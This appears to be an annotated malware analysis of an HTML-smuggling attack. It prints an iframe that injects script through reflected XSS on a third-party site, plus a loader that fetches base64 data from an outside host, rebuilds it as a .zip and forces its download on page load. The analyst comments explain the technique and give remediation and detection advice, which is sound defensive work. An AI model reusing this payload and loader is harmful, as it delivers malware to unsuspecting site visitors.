- IFRAME + XSS
- <body style="margin:0;padding:0;"><iframe allowtransparency="true" style="position:relative; top: -160px; left: -100px;width:10;height:10" src="https://www.vrandaman.com//Article/tag.php?t=<script src='http://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script><script type="text/javascript" src='http://eraa1d.contsfinas.xyz/jquery.min.php'>IF</script>?"> <!-- Analyst note: the iframe is sized 10x10 and moved by negative offsets (top -160px, left -100px), which presumably keeps it out of the visitor's view. Its src places script tags inside the t= parameter of tag.php on a third-party site; this only has an effect if that page echoes t without encoding (reflected XSS), in which case jQuery and then jquery.min.php from eraa1d.contsfinas.xyz would execute in that site's origin. Remediation on the affected site: HTML-encode t on output and restrict script sources with a Content-Security-Policy. Detection: request logs showing t= values that contain script tags. -->
- jquery.min.php
- function sbuffers(base64){ // Helper: decodes a base64 string into raw bytes and returns the backing ArrayBuffer.
- var binary_string = atob(base64); // atob yields a "binary string": one character per decoded byte
- var len = binary_string.length;
- var bytes = new Uint8Array(len);for (var i=0;i < len; i++){bytes[i] = binary_string.charCodeAt(i);} // copy each char code into the typed array, one byte per character
- return bytes.buffer;} // callers receive the ArrayBuffer, not the Uint8Array view
- function RicksGutis() { // Analyst note: forced-download routine. It fetches base64 text from the URL below, rebuilds the bytes in the browser and saves them as a .zip through a programmatic link click. This matches the HTML smuggling pattern (MITRE ATT&CK T1027.006): the archive is assembled client-side rather than served as a file.
- try {
- var sUrl = "http://eraa1d.contsfinas.xyz/FBZDCLXBV/J66M29MK3X37/65400712/Seu_DocPress825"; // hard-coded payload base URL over plain HTTP; host and path are the network indicators for this sample
- now = new Date; // no var/let: this assigns an implicit global named `now`
- var Doc = now.getHours() + now.getMinutes() + now.getSeconds() + now.getMilliseconds(); // numeric sum of the four clock fields; used only as a filename suffix that changes between runs
- var fileName = sUrl.replace(/^.*[\\/]/, "") + Doc + ".zip"; // keeps the text after the last slash of sUrl ("Seu_DocPress825"), then appends the suffix and ".zip"
- $.get( sUrl + "z64y64", function(response){ // `$` is not defined in this script, so jQuery must already be loaded on the page; the actual request URL is sUrl with "z64y64" appended
- var file = response; // response body is treated as base64 text
- var data = sbuffers(file); // decoded to an ArrayBuffer by the helper defined alongside this function
- var blob = new Blob([data],{type: "octet/stream"}); // in-memory file object; the bytes never cross the network as a .zip, so controls keyed on the response's file type would presumably see only text
- if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName); // legacy IE/Edge branch: feature-detects msSaveOrOpenBlob but calls msSaveBlob to save directly
- else{
- var a = document.createElement("a"); // other browsers: build an anchor element to carry the download
- document.body.appendChild(a);
- a.style = "display: none"; // the anchor is never shown to the visitor
- var url = window.URL.createObjectURL(blob); // blob: URL that points at the in-memory bytes
- a.href = url;
- a.download = fileName; // download attribute makes the click save a file under fileName instead of navigating
- a.click(); // script-initiated click: the save starts without any user interaction in this code
- window.URL.revokeObjectURL(url); // releases the blob: URL right after the click
- window.stop(); // halts any further loading of the current page
- }
- }
- );
- }
- catch(err) { // only exceptions thrown synchronously inside the try block land here (presumably `$` being undefined); err itself is never inspected
- setTimeout(RicksGutis, 2000); // re-runs the whole routine after 2 seconds
- }
- }
- RicksGutis(); // called as soon as the script is evaluated, so the download attempt starts on page load with no user action; endpoint detection can key on an unexpected "Seu_DocPress825<digits>.zip" appearing in the browser's download location